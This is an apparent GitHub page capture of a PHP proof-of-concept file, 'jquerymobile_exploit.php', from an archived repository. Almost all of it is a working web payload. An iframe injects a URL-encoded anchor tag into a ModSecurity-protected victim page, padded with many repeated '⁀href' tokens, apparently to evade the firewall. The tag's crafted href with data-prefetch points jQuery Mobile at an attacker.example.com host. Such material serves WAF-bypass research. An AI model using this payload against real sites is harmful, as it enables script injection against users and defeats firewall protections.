This repository has been archived by the owner on Jan 10, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 246
/
jquerymobile_exploit.php
37 lines (35 loc) · 2.59 KB
/
jquerymobile_exploit.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<iframe src="http://victim.example.com/repo/waf/modsecurity/jquerymobile.php?inj=<?php
$payload = <<<'PAYLOAD'
<a
/
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
/
href=http://victim.example.com::@attacker.example.com/jquerymobile.php data-prefetch=true>
hello?
</a>
PAYLOAD;
echo rawurlencode($payload);
?>"></iframe>